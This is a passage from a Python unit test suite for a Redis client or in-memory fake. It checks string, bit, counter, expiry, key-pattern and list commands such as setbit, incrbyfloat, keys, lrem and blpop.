def test_saving_unicode_type_as_key(self):
self.assertEqual(self.redis.set(u'Ñandu', 'foo'), True)
self.assertEqual(self.redis.get(u'Ñandu'), b'foo')
def test_future_newbytes(self):
try:
from builtins import bytes
except ImportError:
raise SkipTest('future.types not available')
self.redis.set(bytes(b'\xc3\x91andu'), 'foo')
self.assertEqual(self.redis.get(u'Ñandu'), b'foo')
def test_future_newstr(self):
try:
from builtins import str
except ImportError:
raise SkipTest('future.types not available')
self.redis.set(str(u'Ñandu'), 'foo')
self.assertEqual(self.redis.get(u'Ñandu'), b'foo')
def test_get_does_not_exist(self):
self.assertEqual(self.redis.get('foo'), None)
def test_get_with_non_str_keys(self):
self.assertEqual(self.redis.set('2', 'bar'), True)
self.assertEqual(self.redis.get(2), b'bar')
def test_get_invalid_type(self):
self.assertEqual(self.redis.hset('foo', 'key', 'value'), 1)
with self.assertRaises(redis.ResponseError):
self.redis.get('foo')
def test_set_non_str_keys(self):
self.assertEqual(self.redis.set(2, 'bar'), True)
self.assertEqual(self.redis.get(2), b'bar')
self.assertEqual(self.redis.get('2'), b'bar')
def test_getbit(self):
self.redis.setbit('foo', 3, 1)
self.assertEqual(self.redis.getbit('foo', 0), 0)
self.assertEqual(self.redis.getbit('foo', 1), 0)
self.assertEqual(self.redis.getbit('foo', 2), 0)
self.assertEqual(self.redis.getbit('foo', 3), 1)
self.assertEqual(self.redis.getbit('foo', 4), 0)
self.assertEqual(self.redis.getbit('foo', 100), 0)
def test_getbit_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.getbit('foo', 1)
def test_multiple_bits_set(self):
self.redis.setbit('foo', 1, 1)
self.redis.setbit('foo', 3, 1)
self.redis.setbit('foo', 5, 1)
self.assertEqual(self.redis.getbit('foo', 0), 0)
self.assertEqual(self.redis.getbit('foo', 1), 1)
self.assertEqual(self.redis.getbit('foo', 2), 0)
self.assertEqual(self.redis.getbit('foo', 3), 1)
self.assertEqual(self.redis.getbit('foo', 4), 0)
self.assertEqual(self.redis.getbit('foo', 5), 1)
self.assertEqual(self.redis.getbit('foo', 6), 0)
def test_unset_bits(self):
self.redis.setbit('foo', 1, 1)
self.redis.setbit('foo', 2, 0)
self.redis.setbit('foo', 3, 1)
self.assertEqual(self.redis.getbit('foo', 1), 1)
self.redis.setbit('foo', 1, 0)
self.assertEqual(self.redis.getbit('foo', 1), 0)
self.redis.setbit('foo', 3, 0)
self.assertEqual(self.redis.getbit('foo', 3), 0)
def test_get_set_bits(self):
# set bit 5
self.assertFalse(self.redis.setbit('a', 5, True))
self.assertTrue(self.redis.getbit('a', 5))
# unset bit 4
self.assertFalse(self.redis.setbit('a', 4, False))
self.assertFalse(self.redis.getbit('a', 4))
# set bit 4
self.assertFalse(self.redis.setbit('a', 4, True))
self.assertTrue(self.redis.getbit('a', 4))
# set bit 5 again
self.assertTrue(self.redis.setbit('a', 5, True))
self.assertTrue(self.redis.getbit('a', 5))
def test_setbits_and_getkeys(self):
# The bit operations and the get commands
# should play nicely with each other.
self.redis.setbit('foo', 1, 1)
self.assertEqual(self.redis.get('foo'), b'@')
self.redis.setbit('foo', 2, 1)
self.assertEqual(self.redis.get('foo'), b'`')
self.redis.setbit('foo', 3, 1)
self.assertEqual(self.redis.get('foo'), b'p')
self.redis.setbit('foo', 9, 1)
self.assertEqual(self.redis.get('foo'), b'p@')
self.redis.setbit('foo', 54, 1)
self.assertEqual(self.redis.get('foo'), b'p@\x00\x00\x00\x00\x02')
def test_setbit_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.setbit('foo', 0, 1)
def test_setbit_expiry(self):
self.redis.set('foo', b'0x00', ex=10)
self.redis.setbit('foo', 1, 1)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_bitcount(self):
self.redis.delete('foo')
self.assertEqual(self.redis.bitcount('foo'), 0)
self.redis.setbit('foo', 1, 1)
self.assertEqual(self.redis.bitcount('foo'), 1)
self.redis.setbit('foo', 8, 1)
self.assertEqual(self.redis.bitcount('foo'), 2)
self.assertEqual(self.redis.bitcount('foo', 1, 1), 1)
self.redis.setbit('foo', 57, 1)
self.assertEqual(self.redis.bitcount('foo'), 3)
self.redis.set('foo', ' ')
self.assertEqual(self.redis.bitcount('foo'), 1)
def test_bitcount_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.bitcount('foo')
def test_getset_not_exist(self):
val = self.redis.getset('foo', 'bar')
self.assertEqual(val, None)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_getset_exists(self):
self.redis.set('foo', 'bar')
val = self.redis.getset('foo', b'baz')
self.assertEqual(val, b'bar')
val = self.redis.getset('foo', b'baz2')
self.assertEqual(val, b'baz')
def test_getset_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.getset('foo', 'bar')
def test_setitem_getitem(self):
self.assertEqual(self.redis.keys(), [])
self.redis['foo'] = 'bar'
self.assertEqual(self.redis['foo'], b'bar')
def test_getitem_non_existent_key(self):
self.assertEqual(self.redis.keys(), [])
with self.assertRaises(KeyError):
self.redis['noexists']
def test_strlen(self):
self.redis['foo'] = 'bar'
self.assertEqual(self.redis.strlen('foo'), 3)
self.assertEqual(self.redis.strlen('noexists'), 0)
def test_strlen_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.strlen('foo')
def test_substr(self):
self.redis['foo'] = 'one_two_three'
self.assertEqual(self.redis.substr('foo', 0), b'one_two_three')
self.assertEqual(self.redis.substr('foo', 0, 2), b'one')
self.assertEqual(self.redis.substr('foo', 4, 6), b'two')
self.assertEqual(self.redis.substr('foo', -5), b'three')
def test_substr_noexist_key(self):
self.assertEqual(self.redis.substr('foo', 0), b'')
self.assertEqual(self.redis.substr('foo', 10), b'')
self.assertEqual(self.redis.substr('foo', -5, -1), b'')
def test_substr_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.substr('foo', 0)
def test_append(self):
self.assertTrue(self.redis.set('foo', 'bar'))
self.assertEqual(self.redis.append('foo', 'baz'), 6)
self.assertEqual(self.redis.get('foo'), b'barbaz')
def test_append_with_no_preexisting_key(self):
self.assertEqual(self.redis.append('foo', 'bar'), 3)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_append_wrong_type(self):
self.redis.rpush('foo', b'x')
with self.assertRaises(redis.ResponseError):
self.redis.append('foo', b'x')
def test_incr_with_no_preexisting_key(self):
self.assertEqual(self.redis.incr('foo'), 1)
self.assertEqual(self.redis.incr('bar', 2), 2)
def test_incr_by(self):
self.assertEqual(self.redis.incrby('foo'), 1)
self.assertEqual(self.redis.incrby('bar', 2), 2)
def test_incr_preexisting_key(self):
self.redis.set('foo', 15)
self.assertEqual(self.redis.incr('foo', 5), 20)
self.assertEqual(self.redis.get('foo'), b'20')
def test_incr_expiry(self):
self.redis.set('foo', 15, ex=10)
self.redis.incr('foo', 5)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_incr_bad_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.incr('foo', 15)
self.redis.rpush('foo2', 1)
with self.assertRaises(redis.ResponseError):
self.redis.incr('foo2', 15)
def test_incr_with_float(self):
with self.assertRaises(redis.ResponseError):
self.redis.incr('foo', 2.0)
def test_incr_followed_by_mget(self):
self.redis.set('foo', 15)
self.assertEqual(self.redis.incr('foo', 5), 20)
self.assertEqual(self.redis.get('foo'), b'20')
def test_incr_followed_by_mget_returns_strings(self):
self.redis.incr('foo', 1)
self.assertEqual(self.redis.mget(['foo']), [b'1'])
def test_incrbyfloat(self):
self.redis.set('foo', 0)
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 1.0)
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 2.0)
def test_incrbyfloat_with_noexist(self):
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 1.0)
self.assertEqual(self.redis.incrbyfloat('foo', 1.0), 2.0)
def test_incrbyfloat_expiry(self):
self.redis.set('foo', 1.5, ex=10)
self.redis.incrbyfloat('foo', 2.5)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_incrbyfloat_bad_type(self):
self.redis.set('foo', 'bar')
with self.assertRaisesRegexp(redis.ResponseError, 'not a valid float'):
self.redis.incrbyfloat('foo', 1.0)
self.redis.rpush('foo2', 1)
with self.assertRaises(redis.ResponseError):
self.redis.incrbyfloat('foo2', 1.0)
def test_incrbyfloat_precision(self):
x = 1.23456789123456789
self.assertEqual(self.redis.incrbyfloat('foo', x), x)
self.assertEqual(float(self.redis.get('foo')), x)
def test_decr(self):
self.redis.set('foo', 10)
self.assertEqual(self.redis.decr('foo'), 9)
self.assertEqual(self.redis.get('foo'), b'9')
def test_decr_newkey(self):
self.redis.decr('foo')
self.assertEqual(self.redis.get('foo'), b'-1')
def test_decr_expiry(self):
self.redis.set('foo', 10, ex=10)
self.redis.decr('foo', 5)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_decr_badtype(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.decr('foo', 15)
self.redis.rpush('foo2', 1)
with self.assertRaises(redis.ResponseError):
self.redis.decr('foo2', 15)
def test_keys(self):
self.redis.set('', 'empty')
self.redis.set('abc\n', '')
self.redis.set('abc\\', '')
self.redis.set('abcde', '')
if self.decode_responses:
self.assertEqual(sorted(self.redis.keys()),
[b'', b'abc\n', b'abc\\', b'abcde'])
else:
self.redis.set(b'\xfe\xcd', '')
self.assertEqual(sorted(self.redis.keys()),
[b'', b'abc\n', b'abc\\', b'abcde', b'\xfe\xcd'])
self.assertEqual(self.redis.keys('??'), [b'\xfe\xcd'])
# empty pattern not the same as no pattern
self.assertEqual(self.redis.keys(''), [b''])
# ? must match \n
self.assertEqual(sorted(self.redis.keys('abc?')),
[b'abc\n', b'abc\\'])
# must be anchored at both ends
self.assertEqual(self.redis.keys('abc'), [])
self.assertEqual(self.redis.keys('bcd'), [])
# wildcard test
self.assertEqual(self.redis.keys('a*de'), [b'abcde'])
# positive groups
self.assertEqual(sorted(self.redis.keys('abc[d\n]*')),
[b'abc\n', b'abcde'])
self.assertEqual(self.redis.keys('abc[c-e]?'), [b'abcde'])
self.assertEqual(self.redis.keys('abc[e-c]?'), [b'abcde'])
self.assertEqual(self.redis.keys('abc[e-e]?'), [])
self.assertEqual(self.redis.keys('abcd[ef'), [b'abcde'])
# negative groups
self.assertEqual(self.redis.keys('abc[^d\\\\]*'), [b'abc\n'])
# some escaping cases that redis handles strangely
self.assertEqual(self.redis.keys('abc\\'), [b'abc\\'])
self.assertEqual(self.redis.keys(r'abc[\c-e]e'), [])
self.assertEqual(self.redis.keys(r'abc[c-\e]e'), [])
def test_exists(self):
self.assertFalse('foo' in self.redis)
self.redis.set('foo', 'bar')
self.assertTrue('foo' in self.redis)
def test_contains(self):
self.assertFalse(self.redis.exists('foo'))
self.redis.set('foo', 'bar')
self.assertTrue(self.redis.exists('foo'))
def test_rename(self):
self.redis.set('foo', 'unique value')
self.assertTrue(self.redis.rename('foo', 'bar'))
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.get('bar'), b'unique value')
def test_rename_nonexistent_key(self):
with self.assertRaises(redis.ResponseError):
self.redis.rename('foo', 'bar')
def test_renamenx_doesnt_exist(self):
self.redis.set('foo', 'unique value')
self.assertTrue(self.redis.renamenx('foo', 'bar'))
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.get('bar'), b'unique value')
def test_rename_does_exist(self):
self.redis.set('foo', 'unique value')
self.redis.set('bar', 'unique value2')
self.assertFalse(self.redis.renamenx('foo', 'bar'))
self.assertEqual(self.redis.get('foo'), b'unique value')
self.assertEqual(self.redis.get('bar'), b'unique value2')
def test_rename_expiry(self):
self.redis.set('foo', 'value1', ex=10)
self.redis.set('bar', 'value2')
self.redis.rename('foo', 'bar')
self.assertGreater(self.redis.ttl('bar'), 0)
def test_mget(self):
self.redis.set('foo', 'one')
self.redis.set('bar', 'two')
self.assertEqual(self.redis.mget(['foo', 'bar']), [b'one', b'two'])
self.assertEqual(self.redis.mget(['foo', 'bar', 'baz']),
[b'one', b'two', None])
self.assertEqual(self.redis.mget('foo', 'bar'), [b'one', b'two'])
self.assertEqual(self.redis.mget('foo', 'bar', None),
[b'one', b'two', None])
def test_mget_with_no_keys_raises_error(self):
with self.assertRaisesRegexp(
redis.ResponseError, 'wrong number of arguments'):
self.redis.mget([])
def test_mget_mixed_types(self):
self.redis.hset('hash', 'bar', 'baz')
self.redis.zadd('zset', 1, 'bar')
self.redis.sadd('set', 'member')
self.redis.rpush('list', 'item1')
self.redis.set('string', 'value')
self.assertEqual(
self.redis.mget(['hash', 'zset', 'set', 'string', 'absent']),
[None, None, None, b'value', None])
def test_mset_with_no_keys_raises_error(self):
with self.assertRaisesRegexp(
redis.RedisError, 'MSET requires'):
self.redis.mset([])
def test_mset(self):
self.assertEqual(self.redis.mset({'foo': 'one', 'bar': 'two'}), True)
self.assertEqual(self.redis.mset({'foo': 'one', 'bar': 'two'}), True)
self.assertEqual(self.redis.mget('foo', 'bar'), [b'one', b'two'])
def test_mset_accepts_kwargs(self):
self.assertEqual(
self.redis.mset(foo='one', bar='two'), True)
self.assertEqual(
self.redis.mset(foo='one', baz='three'), True)
self.assertEqual(self.redis.mget('foo', 'bar', 'baz'),
[b'one', b'two', b'three'])
def test_msetnx(self):
self.assertEqual(self.redis.msetnx({'foo': 'one', 'bar': 'two'}),
True)
self.assertEqual(self.redis.msetnx({'bar': 'two', 'baz': 'three'}),
False)
self.assertEqual(self.redis.mget('foo', 'bar', 'baz'),
[b'one', b'two', None])
def test_setex(self):
self.assertEqual(self.redis.setex('foo', 100, 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_setex_using_timedelta(self):
self.assertEqual(
self.redis.setex('foo', timedelta(seconds=100), 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_setex_using_float(self):
self.assertRaisesRegexp(
redis.ResponseError, 'integer', self.redis.setex, 'foo', 1.2,
'bar')
def test_set_ex(self):
self.assertEqual(self.redis.set('foo', 'bar', ex=100), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_ex_using_timedelta(self):
self.assertEqual(
self.redis.set('foo', 'bar', ex=timedelta(seconds=100)), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_px(self):
self.assertEqual(self.redis.set('foo', 'bar', px=100), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_px_using_timedelta(self):
self.assertEqual(
self.redis.set('foo', 'bar', px=timedelta(milliseconds=100)), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_set_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=-100)
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=0)
self.assertFalse(self.redis.exists('foo'))
def test_set_using_timedelta_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=timedelta(seconds=-100))
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', ex=timedelta(seconds=0))
self.assertFalse(self.redis.exists('foo'))
def test_set_raises_wrong_px(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=-100)
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=0)
self.assertFalse(self.redis.exists('foo'))
def test_set_using_timedelta_raises_wrong_px(self):
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=timedelta(milliseconds=-100))
with self.assertRaises(ResponseError):
self.redis.set('foo', 'bar', px=timedelta(milliseconds=0))
self.assertFalse(self.redis.exists('foo'))
def test_setex_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.setex('foo', -100, 'bar')
with self.assertRaises(ResponseError):
self.redis.setex('foo', 0, 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_setex_using_timedelta_raises_wrong_ex(self):
with self.assertRaises(ResponseError):
self.redis.setex('foo', timedelta(seconds=-100), 'bar')
with self.assertRaises(ResponseError):
self.redis.setex('foo', timedelta(seconds=-100), 'bar')
self.assertFalse(self.redis.exists('foo'))
def test_setnx(self):
self.assertEqual(self.redis.setnx('foo', 'bar'), True)
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.setnx('foo', 'baz'), False)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_delete(self):
self.redis['foo'] = 'bar'
self.assertEqual(self.redis.delete('foo'), True)
self.assertEqual(self.redis.get('foo'), None)
def test_echo(self):
self.assertEqual(self.redis.echo(b'hello'), b'hello')
self.assertEqual(self.redis.echo('hello'), b'hello')
@attr('slow')
def test_delete_expire(self):
self.redis.set("foo", "bar", ex=1)
self.redis.delete("foo")
self.redis.set("foo", "bar")
sleep(2)
self.assertEqual(self.redis.get("foo"), b'bar')
def test_delete_multiple(self):
self.redis['one'] = 'one'
self.redis['two'] = 'two'
self.redis['three'] = 'three'
# Since redis>=2.7.6 returns number of deleted items.
self.assertEqual(self.redis.delete('one', 'two'), 2)
self.assertEqual(self.redis.get('one'), None)
self.assertEqual(self.redis.get('two'), None)
self.assertEqual(self.redis.get('three'), b'three')
self.assertEqual(self.redis.delete('one', 'two'), False)
# If any keys are deleted, True is returned.
self.assertEqual(self.redis.delete('two', 'three'), True)
self.assertEqual(self.redis.get('three'), None)
def test_delete_nonexistent_key(self):
self.assertEqual(self.redis.delete('foo'), False)
# Tests for the list type.
def test_rpush_then_lrange_with_nested_list1(self):
self.assertEqual(self.redis.rpush('foo', [long(12345), long(6789)]), 1)
self.assertEqual(self.redis.rpush('foo', [long(54321), long(9876)]), 2)
self.assertEqual(self.redis.lrange(
'foo', 0, -1), ['[12345L, 6789L]', '[54321L, 9876L]'] if PY2 else
[b'[12345, 6789]', b'[54321, 9876]'])
def test_rpush_then_lrange_with_nested_list2(self):
self.assertEqual(self.redis.rpush('foo', [long(12345), 'banana']), 1)
self.assertEqual(self.redis.rpush('foo', [long(54321), 'elephant']), 2)
self.assertEqual(self.redis.lrange(
'foo', 0, -1),
['[12345L, \'banana\']', '[54321L, \'elephant\']'] if PY2 else
[b'[12345, \'banana\']', b'[54321, \'elephant\']'])
def test_rpush_then_lrange_with_nested_list3(self):
self.assertEqual(self.redis.rpush('foo', [long(12345), []]), 1)
self.assertEqual(self.redis.rpush('foo', [long(54321), []]), 2)
self.assertEqual(self.redis.lrange(
'foo', 0, -1), ['[12345L, []]', '[54321L, []]'] if PY2 else
[b'[12345, []]', b'[54321, []]'])
def test_lpush_then_lrange_all(self):
self.assertEqual(self.redis.lpush('foo', 'bar'), 1)
self.assertEqual(self.redis.lpush('foo', 'baz'), 2)
self.assertEqual(self.redis.lpush('foo', 'bam', 'buzz'), 4)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'buzz', b'bam', b'baz', b'bar'])
def test_lpush_then_lrange_portion(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'three')
self.redis.lpush('foo', 'four')
self.assertEqual(self.redis.lrange('foo', 0, 2),
[b'four', b'three', b'two'])
self.assertEqual(self.redis.lrange('foo', 0, 3),
[b'four', b'three', b'two', b'one'])
def test_lpush_key_does_not_exist(self):
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lpush_with_nonstr_key(self):
self.redis.lpush(1, 'one')
self.redis.lpush(1, 'two')
self.redis.lpush(1, 'three')
self.assertEqual(self.redis.lrange(1, 0, 2),
[b'three', b'two', b'one'])
self.assertEqual(self.redis.lrange('1', 0, 2),
[b'three', b'two', b'one'])
def test_lpush_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lpush('foo', 'element')
def test_llen(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'three')
self.assertEqual(self.redis.llen('foo'), 3)
def test_llen_no_exist(self):
self.assertEqual(self.redis.llen('foo'), 0)
def test_llen_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.llen('foo')
def test_lrem_positive_count(self):
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'different')
self.redis.lrem('foo', 2, 'same')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'different'])
def test_lrem_negative_count(self):
self.redis.lpush('foo', 'removeme')
self.redis.lpush('foo', 'three')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'removeme')
self.redis.lrem('foo', -1, 'removeme')
# Should remove it from the end of the list,
# leaving the 'removeme' from the front of the list alone.
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'removeme', b'one', b'two', b'three'])
def test_lrem_zero_count(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 0, 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_default_value(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 0, 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_does_not_exist(self):
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 0, 'one')
# These should be noops.
self.redis.lrem('foo', -2, 'one')
self.redis.lrem('foo', 2, 'one')
def test_lrem_return_value(self):
self.redis.lpush('foo', 'one')
count = self.redis.lrem('foo', 0, 'one')
self.assertEqual(count, 1)
self.assertEqual(self.redis.lrem('foo', 0, 'one'), 0)
def test_lrem_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lrem('foo', 0, 'element')
def test_rpush(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.redis.rpush('foo', 'four', 'five')
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'one', b'two', b'three', b'four', b'five'])
def test_rpush_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.rpush('foo', 'element')
def test_lpop(self):
self.assertEqual(self.redis.rpush('foo', 'one'), 1)
self.assertEqual(self.redis.rpush('foo', 'two'), 2)
self.assertEqual(self.redis.rpush('foo', 'three'), 3)
self.assertEqual(self.redis.lpop('foo'), b'one')
self.assertEqual(self.redis.lpop('foo'), b'two')
self.assertEqual(self.redis.lpop('foo'), b'three')
def test_lpop_empty_list(self):
self.redis.rpush('foo', 'one')
self.redis.lpop('foo')
self.assertEqual(self.redis.lpop('foo'), None)
# Verify what happens if we try to pop from a key
# we've never seen before.
self.assertEqual(self.redis.lpop('noexists'), None)
def test_lpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lpop('foo')
def test_lset(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.redis.lset('foo', 0, 'four')
self.redis.lset('foo', -2, 'five')
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'four', b'five', b'three'])
def test_lset_index_out_of_range(self):
self.redis.rpush('foo', 'one')
with self.assertRaises(redis.ResponseError):
self.redis.lset('foo', 3, 'three')
def test_lset_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lset('foo', 0, 'element')
def test_rpushx(self):
self.redis.rpush('foo', 'one')
self.redis.rpushx('foo', 'two')
self.redis.rpushx('bar', 'three')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'one', b'two'])
self.assertEqual(self.redis.lrange('bar', 0, -1), [])
def test_rpushx_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.rpushx('foo', 'element')
def test_ltrim(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.redis.rpush('foo', 'four')
self.assertTrue(self.redis.ltrim('foo', 1, 3))
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'two', b'three',
b'four'])
self.assertTrue(self.redis.ltrim('foo', 1, -1))
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'three', b'four'])
def test_ltrim_with_non_existent_key(self):
self.assertTrue(self.redis.ltrim('foo', 0, -1))
def test_ltrim_expiry(self):
self.redis.rpush('foo', 'one', 'two', 'three')
self.redis.expire('foo', 10)
self.redis.ltrim('foo', 1, 2)
self.assertGreater(self.redis.ttl('foo'), 0)
def test_ltrim_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.ltrim('foo', 1, -1)
def test_lindex(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.lindex('foo', 0), b'one')
self.assertEqual(self.redis.lindex('foo', 4), None)
self.assertEqual(self.redis.lindex('bar', 4), None)
def test_lindex_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lindex('foo', 0)
def test_lpushx(self):
self.redis.lpush('foo', 'two')
self.redis.lpushx('foo', 'one')
self.redis.lpushx('bar', 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'one', b'two'])
self.assertEqual(self.redis.lrange('bar', 0, -1), [])
def test_lpushx_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.lpushx('foo', 'element')
def test_rpop(self):
self.assertEqual(self.redis.rpop('foo'), None)
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.assertEqual(self.redis.rpop('foo'), b'two')
self.assertEqual(self.redis.rpop('foo'), b'one')
self.assertEqual(self.redis.rpop('foo'), None)
def test_rpop_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.rpop('foo')
def test_linsert_before(self):
self.redis.rpush('foo', 'hello')
self.redis.rpush('foo', 'world')
self.assertEqual(self.redis.linsert('foo', 'before', 'world', 'there'),
3)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'hello', b'there', b'world'])
def test_linsert_after(self):
self.redis.rpush('foo', 'hello')
self.redis.rpush('foo', 'world')
self.assertEqual(self.redis.linsert('foo', 'after', 'hello', 'there'),
3)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'hello', b'there', b'world'])
def test_linsert_no_pivot(self):
self.redis.rpush('foo', 'hello')
self.redis.rpush('foo', 'world')
self.assertEqual(self.redis.linsert('foo', 'after', 'goodbye', 'bar'),
-1)
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'hello', b'world'])
def test_linsert_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.linsert('foo', 'after', 'bar', 'element')
def test_rpoplpush(self):
self.assertEqual(self.redis.rpoplpush('foo', 'bar'), None)
self.assertEqual(self.redis.lpop('bar'), None)
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('bar', 'one')
self.assertEqual(self.redis.rpoplpush('foo', 'bar'), b'two')
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'one'])
self.assertEqual(self.redis.lrange('bar', 0, -1), [b'two', b'one'])
# Catch instances where we store bytes and strings inconsistently
# and thus bar = ['two', b'one']
self.assertEqual(self.redis.lrem('bar', -1, 'two'), 1)
def test_rpoplpush_to_nonexistent_destination(self):
self.redis.rpush('foo', 'one')
self.assertEqual(self.redis.rpoplpush('foo', 'bar'), b'one')
self.assertEqual(self.redis.rpop('bar'), b'one')
def test_rpoplpush_expiry(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('bar', 'two')
self.redis.expire('bar', 10)
self.redis.rpoplpush('foo', 'bar')
self.assertGreater(self.redis.ttl('bar'), 0)
def test_rpoplpush_one_to_self(self):
self.redis.rpush('list', 'element')
self.assertEqual(self.redis.brpoplpush('list', 'list'), b'element')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
def test_rpoplpush_wrong_type(self):
self.redis.set('foo', 'bar')
self.redis.rpush('list', 'element')
with self.assertRaises(redis.ResponseError):
self.redis.rpoplpush('foo', 'list')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
with self.assertRaises(redis.ResponseError):
self.redis.rpoplpush('list', 'foo')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.lrange('list', 0, -1), [b'element'])
def test_blpop_single_list(self):
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
self.redis.rpush('foo', 'three')
self.assertEqual(self.redis.blpop(['foo'], timeout=1),
(b'foo', b'one'))
def test_blpop_test_multiple_lists(self):
self.redis.rpush('baz', 'zero')
self.assertEqual(self.redis.blpop(['foo', 'baz'], timeout=1),
(b'baz', b'zero'))
self.assertFalse(self.redis.exists('baz'))
self.redis.rpush('foo', 'one')
self.redis.rpush('foo', 'two')
# bar has nothing, so the returned value should come
# from foo.
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
(b'foo', b'one'))
self.redis.rpush('bar', 'three')
# bar now has something, so the returned value should come
# from bar.
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
(b'bar', b'three'))
self.assertEqual(self.redis.blpop(['bar', 'foo'], timeout=1),
(b'foo', b'two'))
def test_blpop_allow_single_key(self):
# blpop converts single key arguments to a one element list.
self.redis.rpush('foo', 'one')
self.assertEqual(self.redis.blpop('foo', timeout=1), (b'foo', b'one'))
def test_blpop_wrong_type(self):
self.redis.set('foo', 'bar')
